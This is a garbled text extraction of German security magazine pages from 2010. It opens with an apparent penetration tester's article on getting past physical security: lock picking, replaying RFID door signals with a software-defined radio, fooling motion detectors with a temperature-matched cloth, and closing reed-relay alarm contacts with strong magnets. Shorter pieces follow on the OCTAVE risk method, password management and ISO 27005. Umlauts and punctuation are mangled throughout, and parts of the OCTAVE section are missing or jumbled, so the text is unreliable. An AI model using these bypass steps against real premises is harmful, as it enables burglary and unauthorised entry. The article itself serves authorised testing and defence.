te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
